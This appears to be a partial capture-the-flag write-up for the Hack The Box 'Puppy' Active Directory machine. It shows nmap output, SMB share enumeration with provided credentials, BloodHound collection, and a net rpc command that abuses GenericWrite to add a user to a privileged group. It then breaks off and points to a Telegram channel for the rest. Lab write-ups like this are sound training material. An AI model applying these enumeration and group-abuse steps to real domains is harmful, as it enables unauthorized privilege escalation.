Puppy HTB Writeup | HacktheBox | Season 8
Hi hackers and cybersecurity enthusiasts! As you all know, Hack The Box Season 8 has started, and the first box is 'Puppy'. It's a Windows-based machine, and we can practice Active Directory scenarios on it — such as password resets, credential spraying, DCSync attacks, cracking password-protected notes, and much more.
Machine Information
As is common in real life pentests, you will start the Puppy box with credentials for the following account: levi.james / KingofAkron2025!
🧾 Enumeration
Run a comprehensive TCP scan:
nmap -v -sCTV -p- -T4 -Pn -oN $IP.txt $IP 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2025-05-18 23:03:58Z) 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/tcp6 rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 2,3,4 111/udp6 rpcbind | 100003 2,3 2049/udp nfs | 100003 2,3 2049/udp6 nfs | 100005 1,2,3 2049/udp mountd | 100005 1,2,3 2049/udp6 mountd | 100021 1,2,3,4 2049/tcp nlockmgr | 100021 1,2,3,4 2049/tcp6 nlockmgr | 100021 1,2,3,4 2049/udp nlockmgr | 100021 1,2,3,4 2049/udp6 nlockmgr | 100024 1 2049/tcp status | 100024 1 2049/tcp6 status | 100024 1 2049/udp status |_ 100024 1 2049/udp6 status 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name) 445/tcp open microsoft-ds? 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 2049/tcp open nlockmgr 1-4 (RPC #100021) 2847/tcp closed aimpp-port-req 3260/tcp open iscsi? 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: PUPPY.HTB0., Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-title: Not Found |_http-server-header: Microsoft-HTTPAPI/2.0 6127/tcp closed unknown 7321/tcp closed swx 9389/tcp open mc-nmf .NET Message Framing 15528/tcp closed unknown 21928/tcp closed unknown 23599/tcp closed unknown 23918/tcp closed unknown 29431/tcp closed unknown 33224/tcp closed unknown 39889/tcp closed unknown 48207/tcp closed unknown 49664/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49670/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49685/tcp open tcpwrapped 51736/tcp open msrpc Microsoft Windows RPC 51778/tcp open msrpc Microsoft Windows RPC 52819/tcp open tcpwrapped 56992/tcp closed unknown 61461/tcp open tcpwrapped 63665/tcp closed unknown
Update /etc/hosts
echo "xx.xx.xx.xx DC.PUPPY.HTB PUPPY.HTB" | sudo tee -a /etc/hosts
Spray attack
As you know, we already have credentials for a low-privileged account, so now we'll just perform a spray attack using the NXC tool.
nxc smb $IP -u levi.james -p 'KingofAkron2025!'
SMB Enumeration
We know that with the help of the credentials, we're able to log in to SMB. Now, we want to check whether we can find any juicy information on the SMB server. For example, we might look for writable directories, shared drives, or sensitive files.
In an Active Directory environment, finding SMB access can lead to several possible scenarios:
- Access to shared folders containing credentials, config files, or password notes.
- Enumeration of user and group information from readable shares like NETLOGON or SYSVOL.
- Uploading files to writable shares that could be used for lateral movement or privilege escalation (e.g., planting a malicious script).
- Discovering login scripts or GPO files that contain plaintext credentials.
- Checking for misconfigured permissions that allow overwriting existing files.
So, let’s enumerate the shares thoroughly and analyze them for any of these opportunities.
Enumerating SMB Shares
Next, we enumerate the available SMB shares to identify accessible resources:
nxc smb $IP -u levi.james -d PUPPY.HTB -p 'KingofAkron2025!' --shares
🧾 Output:
[*] Enumerated shares Share Permissions Remark ----- ----------- ------ ADMIN$ Remote Admin C$ Default share DEV DEV-SHARE for PUPPY-DEVS IPC$ READ Remote IPC NETLOGON READ Logon server share SYSVOL READ Logon server share
🧱 DEV Share Access Denied — What Next?
Although we successfully authenticated with the SMB service using levi.james, access to the DEV share is denied, likely due to insufficient privileges.
🧠 Strategy: Identify a Privileged User via BloodHound
To determine which user or group has access to the DEV share, we’ll collect Active Directory enumeration data and analyze it using Bloodhound.
🔧 Step-by-Step: Dump Bloodhound Data via NXC
nxc bloodhound $IP -u levi.james -p 'KingofAkron2025!' -d PUPPY.HTB --collection RDP,Session,DCOM,LocalAdmin
Bloodhound
🧠 Bloodhound Analysis
From the graph:
- [email protected] is a member of the [email protected] group.
- The [email protected] group has GenericWrite permissions over the [email protected] group.
🎯 Goal
We want to gain access to the DEV SMB share, which is likely restricted to members of the [email protected] group.
🪜 Step-by-Step Attack Path
🔹 Step 1: Leverage GenericWrite Over DEVELOPERS Group GenericWrite on a group allows us to modify its attributes, such as adding a user to the group.
➡️ So, we will add levi.james to the [email protected] group using this privilege.
net rpc group ADDMEMBERS "DEVELOPERS" levi.james -U "levi.james%KingofAkron2025!" -S $IP
Reconnect to SMB and Access the DEV Share
Now that levi.james is a member of the DEVELOPERS group (which likely has access to the DEV share), re-authenticate and check the access:
smbclient //$IP/DEV -U "levi.james" # OR using nxc again nxc smb $IP -u levi.james -p 'KingofAkron2025!' -d PUPPY.HTB --shares
Access is restricted by HackTheBox rules#
The solution to the problem can be published in the public domain after her retirement.
Look for a non-public solution to the problem in the telegram channel .
Hack The Box Machine Breakdown: Voleur htb writeup hackthebox
📅 Release Date: 06 July 2025 💻 OS: Windows 🧠 Difficulty: Medium 🔓 Initial Acc...
